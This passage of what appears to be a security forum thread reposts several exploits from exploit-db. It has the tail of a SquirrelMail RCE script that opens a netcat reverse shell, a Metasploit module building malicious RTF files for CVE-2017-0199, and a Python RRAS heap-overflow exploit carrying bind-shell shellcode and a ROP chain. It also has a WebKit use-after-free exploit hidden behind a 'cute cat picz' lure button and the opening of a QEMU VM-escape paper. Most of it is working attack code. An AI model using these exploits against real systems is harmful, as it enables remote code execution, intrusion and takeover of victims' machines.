"new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null if [ $? -ne 0 ]; then echo "Failed to inject sendmail parameters" exit 2 fi # Send email which triggers the RCE vuln and runs phprevsh echo -e "\n[*] Sending the email to trigger the vuln" (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \ -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) & if [ $pchoice -eq 2 ]; then echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port" nc -vv -l -p $reverse_port else echo -e "\n[*] The test file should have been written at /tmp/sqpoc" fi grep -q "302 Found" /tmp/sheaders if [ $? -eq 1 ]; then echo "There was a problem with sending email" exit 2 fi # Done echo -e "\n[*] All done. Exiting" Sursa: https://www.exploit-db.com/exploits/41910/
-
- 1
-
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => "Microsoft Office Word Malicious Hta Execution", 'Description' => %q{ This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample. }, 'Author' => [ 'Haifei Li', # vulnerability analysis 'ryHanson', 'wdormann', 'DidierStevens', 'vysec', 'Nixawk', # module developer 'sinn3r' # msf module improvement ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-0199'], ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'], ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'], ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'], ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'], ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'], ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'], ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'], ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'], ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'], ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199'] ], 'Platform' => 'win', 'Targets' => [ [ 'Microsoft Office Word', {} ] ], 'DefaultOptions' => { 'DisablePayloadHandler' => false }, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 14 2017')) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta']) ], self.class) end def generate_uri uri_maxlength = 112 host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] scheme = datastore['SSL'] ? 'https' : 'http' uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}" uri = Rex::Text.hexify(Rex::Text.to_unicode(uri)) uri.delete!("\n") uri.delete!("\\x") uri.delete!("\\") padding_length = uri_maxlength * 2 - uri.length fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative? padding_length.times { uri << "0" } uri end def create_ole_ministream_data # require 'rex/ole' # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ) # ministream = ole.instance_variable_get(:@ministream) # ministream_data = ministream.instance_variable_get(:@data) ministream_data = "" ministream_data << "01000002090000000100000000000000" # 00000000: ................ ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K...... ministream_data << generate_uri ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.] ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............ ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................ ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7........... ministream_data << "00000000000000000000000000000000" # 000000f0: ................ ministream_data << "100203000d0000000000000000000000" # 00000100: ................ ministream_data << "00000000000000000000000000000000" # 00000110: ................ ministream_data << "00000000000000000000000000000000" # 00000120: ................ ministream_data << "00000000000000000000000000000000" # 00000130: ................ ministream_data << "00000000000000000000000000000000" # 00000140: ................ ministream_data << "00000000000000000000000000000000" # 00000150: ................ ministream_data << "00000000000000000000000000000000" # 00000160: ................ ministream_data << "00000000000000000000000000000000" # 00000170: ................ ministream_data << "00000000000000000000000000000000" # 00000180: ................ ministream_data << "00000000000000000000000000000000" # 00000190: ................ ministream_data << "00000000000000000000000000000000" # 000001a0: ................ ministream_data << "00000000000000000000000000000000" # 000001b0: ................ ministream_data << "00000000000000000000000000000000" # 000001c0: ................ ministream_data << "00000000000000000000000000000000" # 000001d0: ................ ministream_data << "00000000000000000000000000000000" # 000001e0: ................ ministream_data << "00000000000000000000000000000000" # 000001f0: ................ ministream_data end def create_rtf_format template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf") template_rtf = ::File.open(template_path, 'rb') data = template_rtf.read(template_rtf.stat.size) data.gsub!('MINISTREAM_DATA', create_ole_ministream_data) template_rtf.close data end def on_request_uri(cli, req) p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform => 'win' } ) # This allows the HTA window to be invisible data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n") send_response(cli, data, 'Content-Type' => 'application/hta') end def exploit file_create(create_rtf_format) super end end Sursa: https://www.exploit-db.com/exploits/41934/
-
#!/usr/bin/env python # -*- coding: utf-8 -*- ################################################################################## # By Victor Portal (vportal) for educational porpouse only ################################################################################## # This exploit is the python version of the ErraticGopher exploit probably # # with some modifications. ErraticGopher exploits a memory corruption # # (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. # # Because the Magic bytes, the application redirects the execution to the # # iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy # # all te injected stub from the heap to the stack, overwritten a return # # address as well as the SEH handler stored in the Stack, being possible # # to control the execution flow to disable DEP and jump to the shellcode # # as SYSTEM user. # ################################################################################## #The exploit only works if target has the RRAS service enabled #Tested on Windows Server 2003 SP2 import struct import sys import time import os from threading import Thread from impacket import smb from impacket import uuid from impacket import dcerpc from impacket.dcerpc.v5 import transport target = sys.argv[1] print '[-]Initiating connection' trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target) trans.connect() print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target dce = trans.DCERPC_class(trans) #RRAS DCE-RPC CALL dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0'))) egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a" egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python buf = "" buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33" buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc" buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8" buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f" buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35" buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43" buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f" buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01" buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6" buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff" buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2" buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9" buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7" buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51" buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04" buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9" buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23" buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98" buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97" buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5" buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5" buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd" buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b" buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b" buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9" buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90" buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8" buf += "\xc4\x25\x3d\xe9" #NX disable routine for Windows Server 2003 SP2 rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll rop += "\x45"*16 rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll rop += "\x5d\x7a\x81\x7c" #ret 20 rop += "\x71\x42\x38\x77" #jmp esp rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll rop += "\x90"*2 + egghunter + "\x90"*42 rop += "\x17\xf5\x83\x7c" #Disable NX routine rop += "\x90"*4 stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf)) stub += "\x12" #Magic byte stub += "\x46"*522 stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function) print "[-]Exploit sent to target successfully..." print "Waiting for shell..." time.sleep(5) os.system("nc " + target + " 4444") Sursa: https://www.exploit-db.com/exploits/41929/
-
<!-- Sources: https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf https://github.com/phoenhex/files/blob/master/exploits/cachedcall-uaf.html Overview The WebKit bug we used at Pwn2Own is CVE-2017-2491 / ZDI-17-231, a use-after-free of a JSString object in JavaScriptCore. By triggering it, we can obtain a dangling pointer to a JSString object in a JavaScript callback. At first, the specific scenario seems very hard to exploit, but we found a rather generic technique to still get a reliable read/write primitive out of it, although it requires a very large (~28 GiB) heap spray. This is possible even on a MacBook with 8 GB of RAM thanks to the page compression mechanism in macOS. --> <script> function make_compiled_function() { function target(x) { return x*5 + x - x*x; } // Call only once so that function gets compiled with low level interpreter // but none of the optimizing JITs target(0); return target; } function pwn() { var haxs = new Array(0x100); for (var i = 0; i < 0x100; ++i) haxs[i] = new Uint8Array(0x100); // hax is surrounded by other Uint8Array instances. Thus *(&hax - 8) == 0x100, // which is the butterfly length if hax is later used as a butterfly for a // fake JSArray. var hax = haxs[0x80]; var hax2 = haxs[0x81]; var target_func = make_compiled_function(); // Small helper to avoid allocations with .set(), so we don't mess up the heap function set(p, i, a,b,c,d,e,f,g,h) { p[i+0]=a; p[i+1]=b; p[i+2]=c; p[i+3]=d; p[i+4]=e; p[i+5]=f; p[i+6]=g; p[i+7]=h; } function spray() { var res = new Uint8Array(0x7ffff000); for (var i = 0; i < 0x7ffff000; i += 0x1000) { // Write heap pattern. // We only need a structure pointer every 128 bytes, but also some of // structure fields need to be != 0 and I can't remember which, so we just // write pointers everywhere. for (var j = 0; j < 0x1000; j += 8) set(res, i + j, 0x08, 0, 0, 0x50, 0x01, 0, 0, 0); // Write the offset to the beginning of each page so we know later // with which part we overlap. var j = i+1+2*8; set(res, j, j&0xff, (j>>8)&0xff, (j>>16)&0xff, (j>>24)&0xff, 0, 0, 0xff, 0xff); } return res; } // Spray ~14 GiB worth of array buffers with our pattern. var x = [ spray(), spray(), spray(), spray(), spray(), spray(), spray(), spray(), ]; // The butterfly of our fake object will point to 0x200000001. This will always // be inside the second sprayed buffer. var buf = x[1]; // A big array to hold reference to objects we don't want to be freed. var ary = new Array(0x10000000); var cnt = 0; // Set up objects we need to trigger the bug. var n = 0x40000; var m = 10; var regex = new RegExp("(ab)".repeat(n), "g"); var part = "ab".repeat(n); var s = (part + "|").repeat(m); // Set up some views to convert pointers to doubles var convert = new ArrayBuffer(0x20); var cu = new Uint8Array(convert); var cf = new Float64Array(convert); // Construct fake JSCell header set(cu, 0, 0,0,0,0, // structure ID 8, // indexing type 0,0,0); // some more stuff we don't care about var container = { // Inline object with indebufng type 8 and butterly pointing to hax. // Later we will refer to it as fakearray. jsCellHeader: cf[0], butterfly: hax, }; while (1) { // Try to trigger bug s.replace(regex, function() { for (var i = 1; i < arguments.length-2; ++i) { if (typeof arguments[i] === 'string') { // Root all the callback arguments to force GC at some point ary[cnt++] = arguments[i]; continue; } var a = arguments[i]; // a.butterfly points to 0x200000001, which is always // inside buf, but we are not sure what the exact // offset is within it so we read a marker value. var offset = a[2]; // Compute addrof(container) + 16. We write to the fake array, then // read from a sprayed array buffer on the heap. a[2] = container; var addr = 0; for (var j = 7; j >= 0; --j) addr = addr*0x100 + buf[offset + j]; // Add 16 to get address of inline object addr += 16; // Do the inverse to get fakeobj(addr) for (var j = 0; j < 8; ++j) { buf[offset + j] = addr & 0xff; addr /= 0x100; } var fakearray = a[2]; // Re-write the vector pointer of hax to point to hax2. fakearray[2] = hax2; // At this point hax.vector points to hax2, so we can write // the vector pointer of hax2 by writing to hax[16+{0..7}] // Leak address of JSFunction a[2] = target_func; addr = 0; for (var j = 7; j >= 0; --j) addr = addr*0x100 + buf[offset + j]; // Follow a bunch of pointers to RWX location containing the // function's compiled code addr += 3*8; for (var j = 0; j < 8; ++j) { hax[16+j] = addr & 0xff; addr /= 0x100; } addr = 0; for (var j = 7; j >= 0; --j) addr = addr*0x100 + hax2[j]; addr += 3*8; for (var j = 0; j < 8; ++j) { hax[16+j] = addr & 0xff; addr /= 0x100; } addr = 0; for (var j = 7; j >= 0; --j) addr = addr*0x100 + hax2[j]; addr += 4*8; for (var j = 0; j < 8; ++j) { hax[16+j] = addr & 0xff; addr /= 0x100; } addr = 0; for (var j = 7; j >= 0; --j) addr = addr*0x100 + hax2[j]; // Write shellcode for (var j = 0; j < 8; ++j) { hax[16+j] = addr & 0xff; addr /= 0x100; } hax2[0] = 0xcc; hax2[1] = 0xcc; hax2[2] = 0xcc; // Pwn. target_func(); } return "x"; }); } } </script> <button onclick="pwn()">click here for cute cat picz!</button> Sursa: https://www.exploit-db.com/exploits/41964/
-
|=-----------------------------------------------------------------------=| |=----------------------------=[ VM escape ]=----------------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ QEMU Case Study ]=-------------------------=| |=-----------------------------------------------------------------------=| |=---------------------------=[ Mehdi Talbi ]=---------------------------=| |=--------------------------=[ Paul Fariello ]=--------------------------=| |=-----------------------------------------------------------------------=| --[ Table of contents 1 - Introduction 2 - KVW/QEMU Overview 2.1 - Workspace Environment 2.2 - QEMU Memory Layout 2.3 - Address Translation 3 - Memory Leak Exploitation 3.1 - The Vulnerable Code 3.2 - Setting up the Card 3.3 - Exploit 4 - Heap-based Overflow Exploitation 4.1 - The Vulnerable Code 4.2 - Setting up the Card 4.3 - Reversing CRC 4.4 - Exploit 5 - Putting All Together 5.1 - RIP Control 5.2 - Interactive Shell 5.3 - VM-Escape Exploit 5.4 - Limitations 6 - Conclusions 7 - Greets 8 - References 9 - Source Code --[ 1 - Introduction Virtual machines are nowadays heavily deployed for personal use or within the enterprise segment. Network security vendors use for instance different VMs to analyze malwares in a controlled and confined environment. A natural question arises: can the malware escapes from the VM and execute code on the host machine? Last year, Jason Geffner from CrowdStrike, has reported a serious bug in QEMU affecting the virtual floppy drive code that could allow an attacker to escape from the VM [1] to the host. Even if this vulnerability has received considerable attention in the netsec community - probably because it has a dedicated name (VENOM) - it wasn't the first of it's kind. In 2011, Nelson Elhage [2] has reported and successfully exploited a vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is available at [3]. Recently, Xu Liu and Shengping Wang, from Qihoo 360, have showcased at HITB 2016 a successful exploit on KVM/QEMU. They exploited two vulnerabilities (CVE-2015-5165 and CVE-2015-7504) present in two different network card device emulator models, namely, RTL8139 and PCNET. During their presentation, they outlined the main steps towards code execution on the host machine but didn't provide any exploit nor the technical details to reproduce it. In this paper, we provide a in-depth analysis of CVE-2015-5165 (a memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow vulnerability), along with working exploits. The combination of these two exploits allows to break out from a VM and execute code on the target host. We discuss the technical details to exploit the vulnerabilities on QEMU's network card device emulation, and provide generic techniques that could be re-used to exploit future bugs in QEMU. For instance an interactive bindshell that leverages on shared memory areas and shared code. --[ 2 - KVM/QEMU Overview KVM (Kernal-based Virtual Machine) is a kernel module that provides full virtualization infrastructure for user space programs. It allows one to run multiple virtual machines running unmodified Linux or Windows images. The user space component of KVM is included in mainline QEMU (Quick Emulator) which handles especially devices emulation. ----[ 2.1 - Workspace Environment In effort to make things easier to those who want to use the sample code given throughout this paper, we provide here the main steps to reproduce our development environment. Since the vulnerabilities we are targeting has been already patched, we need to checkout the source for QEMU repository and switch to the commit that precedes the fix for these vulnerabilities. Then, we configure QEMU only for target x86_64 and enable debug: $ git clone git://git.qemu-project.org/qemu.git $ cd qemu $ git checkout bd80b59 $ mkdir -p bin/debug/native $ cd bin/debug/native $ ../../../configure --target-list=x86_64-softmmu --enable-debug \ $ --disable-werror $ make In our testing environment, we build QEMU using version 4.9.2 of Gcc. For the rest, we assume that the reader has already a Linux x86_64 image that could be run with the following command line: $ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \ $ -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \ $ -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \ $ -drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback We allocate 2GB of memory and create two network interface cards: RTL8139 and PCNET. We are running QEMU on a Debian 7 running a 3.16 kernel on x_86_64 architecture. ----[ 2.2 - QEMU Memory Layout The physical memory allocated for the guest is actually a mmapp'ed private region in the virtual address space of QEMU. It's important to note that the PROT_EXEC flag is not enabled while allocating the physical memory of the guest. The following figure illustrates how the guest's memory and host's memory cohabits. Guest' processes +--------------------+ Virtual addr space | | +--------------------+ | | \__ Page Table \__ \ \ | | Guest kernel +----+--------------------+----------------+ Guest's phy. memory | | | | +----+--------------------+----------------+ | | \__ \__ \ \ | QEMU process | +----+------------------------------------------+ Virtual addr space | | | +----+------------------------------------------+ | | \__ Page Table \__ \ \ | | +----+-----------------------------------------------++ Physical memory | | || +----+-----------------------------------------------++ Additionaly, QEMU reserves a memory region for BIOS and ROM. These mappings are available in QEMU's maps file: 7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0 7f1828000000-7f18a8000000 rw-p 00000000 00:00 0 [2 GB of RAM] 7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0 7f18a8992000-7f18ac000000 ---p 00000000 00:00 0 7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489 [first shared lib] 7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489 ... 7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489 ... 7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489 ... ... [more shared libs] 7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64] 7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647 ... 7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647 ... 7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0 [heap] 7ffded947000-7ffded968000 rw-p 00000000 00:00 0 [stack] 7ffded968000-7ffded96a000 r-xp 00000000 00:00 0 [vdso] 7ffded96a000-7ffded96c000 r--p 00000000 00:00 0 [vvar] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] A more detailed explanation of memory management in virtualized environment can be found at [4]. ----[ 2.3 - Address Translation Within QEMU there exist two translation layers: - From a guest virtual address to guest physical address. In our exploit, we need to configure network card devices that require DMA access. For example, we need to provide the physical address of Tx/Rx buffers to correctly configure the network card devices. - From a guest physical address to QEMU's virtual address space. In our exploit, we need to inject fake structures and get their precise address in QEMU's virtual address space. On x64 systems, a virtual address is made of a page offset (bits 0-11) and a page number. On linux systems, the pagemap file enables userspace process with CAP_SYS_ADMIN privileges to find out which physical frame each virtual page is mapped to. The pagemap file contains for each virtual page a 64-bit value well-documented in kernel.org [5]: - Bits 0-54 : physical frame number if present. - Bit 55 : page table entry is soft-dirty. - Bit 56 : page exclusively mapped. - Bits 57-60 : zero - Bit 61 : page is file-page or shared-anon. - Bit 62 : page is swapped. - Bit 63 : page is present. To convert a virtual address to a physical one, we rely on Nelson Elhage's code [3]. The following program allocates a buffer, fills it with the string "Where am I?" and prints its physical address: ---[ mmu.c ]--- #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <fcntl.h> #include <assert.h> #include <inttypes.h> #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_PRESENT (1ull << 63) #define PFN_PFN ((1ull << 55) - 1) int fd; uint32_t page_offset(uint32_t addr) { return addr & ((1 << PAGE_SHIFT) - 1); } uint64_t gva_to_gfn(void *addr) { uint64_t pme, gfn; size_t offset; offset = ((uintptr_t)addr >> 9) & ~7; lseek(fd, offset, SEEK_SET); read(fd, &pme, 8); if (!(pme & PFN_PRESENT)) return -1; gfn = pme & PFN_PFN; return gfn; } uint64_t gva_to_gpa(void *addr) { uint64_t gfn = gva_to_gfn(addr); assert(gfn != -1); return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); } int main() { uint8_t *ptr; uint64_t ptr_mem; fd = open("/proc/self/pagemap", O_RDONLY); if (fd < 0) { perror("open"); exit(1); } ptr = malloc(256); strcpy(ptr, "Where am I?"); printf("%s\n", ptr); ptr_mem = gva_to_gpa(ptr); printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem); getchar(); return 0; } If we run the above code inside the guest and attach gdb to the QEMU process, we can see that our buffer is located within the physical address space allocated for the guest. More precisely, we note that the outputted address is actually an offset from the base address of the guest physical memory: root@debian:~# ./mmu Where am I? Your physical address is at 0x78b0d010 (gdb) info proc mappings process 14791 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x7fc314000000 0x7fc314022000 0x22000 0x0 0x7fc314022000 0x7fc318000000 0x3fde000 0x0 0x7fc319dde000 0x7fc31c000000 0x2222000 0x0 0x7fc31c000000 0x7fc39c000000 0x80000000 0x0 ... (gdb) x/s 0x7fc31c000000 + 0x78b0d010 0x7fc394b0d010: "Where am I?" --[ 3 - Memory Leak Exploitation In the following, we will exploit CVE-2015-5165 - a memory leak vulnerability that affects the RTL8139 network card device emulator - in order to reconstruct the memory layout of QEMU. More precisely, we need to leak (i) the base address of the .text segment in order to build our shellcode and (ii) the base address of the physical memory allocated for the guest in order to be able to get the precise address of some injected dummy structures. ----[ 3.1 - The vulnerable Code The REALTEK network card supports two receive/transmit operation modes: C mode and C+ mode. When the card is set up to use C+, the NIC device emulator miscalculates the length of IP packet data and ends up sending more data than actually available in the packet. The vulnerability is present in the rtl8139_cplus_transmit_one function from hw/net/rtl8139.c: /* ip packet header */ ip_header *ip = NULL; int hlen = 0; uint8_t ip_protocol = 0; uint16_t ip_data_len = 0; uint8_t *eth_payload_data = NULL; size_t eth_payload_len = 0; int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12)); if (proto == ETH_P_IP) { DPRINTF("+++ C+ mode has IP packet\n"); /* not aligned */ eth_payload_data = saved_buffer + ETH_HLEN; eth_payload_len = saved_size - ETH_HLEN; ip = (ip_header*)eth_payload_data; if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { DPRINTF("+++ C+ mode packet has bad IP version %d " "expected %d\n", IP_HEADER_VERSION(ip), IP_HEADER_VERSION_4); ip = NULL; } else { hlen = IP_HEADER_LENGTH(ip); ip_protocol = ip->ip_p; ip_data_len = be16_to_cpu(ip->ip_len) - hlen; } } The IP header contains two fields hlen and ip->ip_len that represent the length of the IP header (20 bytes considering a packet without options) and the total length of the packet including the ip header, respectively. As shown at the end of the snippet of code given below, there is no check to ensure that ip->ip_len >= hlen while computing the length of IP data (ip_data_len). As the ip_data_len field is encoded as unsigned short, this leads to sending more data than actually available in the transmit buffer. More precisely, the ip_data_len is later used to compute the length of TCP data that are copied - chunk by chunk if the data exceeds the size of the MTU - into a malloced buffer: int tcp_data_len = ip_data_len - tcp_hlen; int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen; int is_last_frame = 0; for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size) { uint16_t chunk_size = tcp_chunk_size; /* check if this is the last frame */ if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) { is_last_frame = 1; chunk_size = tcp_data_len - tcp_send_offset; } memcpy(data_to_checksum, saved_ip_header + 12, 8); if (tcp_send_offset) { memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size); } /* more code follows */ } So, if we forge a malformed packet with a corrupted length size (e.g. ip->ip_len = hlen - 1), then we can leak approximatively 64 KB from QEMU's heap memory. Instead of sending a single packet, the network card device emulator will end up by sending 43 fragmented packets. ----[ 3.2 - Setting up the Card In order to send our malformed packet and read leaked data, we need to configure first Rx and Tx descriptors buffers on the card, and set up some flags so that our packet flows through the vulnerable code path. The figure below shows the RTL8139 registers. We will not detail all of them but only those which are relevant to our exploit: +---------------------------+----------------------------+ 0x00 | MAC0 | MAR0 | +---------------------------+----------------------------+ 0x10 | TxStatus0 | +--------------------------------------------------------+ 0x20 | TxAddr0 | +-------------------+-------+----------------------------+ 0x30 | RxBuf |ChipCmd| | +-------------+------+------+----------------------------+ 0x40 | TxConfig | RxConfig | ... | +-------------+-------------+----------------------------+ | | | skipping irrelevant registers | | | +---------------------------+--+------+------------------+ 0xd0 | ... | |TxPoll| ... | +-------+------+------------+--+------+--+---------------+ 0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... | +-------+------+------------+------------+---------------+ - TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback test mode), TxCRC (do not append CRC to Tx Packets), etc. - RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept broadcast packets), AcceptMulticast (accept multicast packets), etc. - CpCmd: C+ command register used to enable some functions such as CplusRxEnd (enable receive), CplusTxEnd (enable transmit), etc. - TxAddr0: Physical memory address of Tx descriptors table. - RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors table. - RxRingAddrHI: High 32-bits physical memory address of Rx descriptors table. - TxPoll: Tell the card to check Tx descriptors. A Rx/Tx-descriptor is defined by the following structure where buf_lo and buf_hi are low 32 bits and high 32 bits physical memory address of Tx/Rx buffers, respectively. These addresses point to buffers holding packets to be sent/received and must be aligned on page size boundary. The variable dw0 encodes the size of the buffer plus additional flags such as the ownership flag to denote if the buffer is owned by the card or the driver. struct rtl8139_desc { uint32_t dw0; uint32_t dw1; uint32_t buf_lo; uint32_t buf_hi; }; The network card is configured through in*() out*() primitives (from sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The following snippet of code configures the card and sets up a single Tx descriptor. #define RTL8139_PORT 0xc000 #define RTL8139_BUFFER_SIZE 1500 struct rtl8139_desc desc; void *rtl8139_tx_buffer; uint32_t phy_mem; rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, 